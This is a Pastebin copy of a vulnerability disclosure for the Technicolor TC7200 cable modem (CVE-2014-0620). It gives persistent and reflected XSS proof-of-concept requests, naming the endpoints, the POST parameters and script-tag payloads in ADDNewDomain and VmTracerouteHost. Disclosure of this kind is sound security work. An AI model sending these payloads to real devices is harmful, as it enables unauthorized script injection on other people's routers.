Advertisement
AndrewHaxalot

Technicolor TC7200 - Multiple XSS Vulnerabilities

Jan 4th, 2014
106
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.22 KB | None | 0 0
  1. # Exploit Title: Technicolor TC7200 - Multiple XSS Vulnerabilities
  2. # Google Dork: N/A
  3. # Date: 02-01-2013
  4. # Exploit Author: Jeroen - IT Nerdbox
  5. # Vendor Homepage:
  6. http://www.technicolor.com/en/solutions-services/connected-home/modems-gatew
  7. ays/cable-modems-gateways/tc7200-tc7300
  8. # Software Link: N/A
  9. # Version: STD6.01.12
  10. # Tested on: N/A
  11. # CVE : CVE-2014-0620
  12. #
  13. # Proof of Concept:
  14. #
  15. #
  16. ## Persistent Cross Site Scripting:
  17. #
  18. # POST : http://<ip>/parental/website-filters.asp
  19. # Parameters:
  20. #
  21. # WebFilteringTable 0
  22. # WebFilteringChangePolicies 0
  23. # WebFiltersADDKeywords
  24. # WebFilteringdomainMode 0
  25. # ADDNewDomain <script>alert('IT Nerdbox');</script>
  26. # WebFiltersKeywordButton 0
  27. # WebFiltersDomainButton 1
  28. # WebPolicyName
  29. # WebFiltersRemove 0
  30. # WebFiltersADD 0
  31. # WebFiltersReset 0
  32. #
  33. #
  34. ## Reflected Cross Site Scripting
  35. #
  36. # POST : http://<ip>//goform/status/diagnostics-route
  37. # Parameters:
  38. #
  39. # VmTracerouteHost "><script>alert('IT Nerdbox');</script>
  40. # VmMaxTTL 30
  41. # VmTrIsInProgress 0
  42. # VmTrUtilityCommand 1
  43. #
  44. # Check out the video at: http://www.nerdbox.it/technicolor-tc7200-xss-vulnerabilities/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement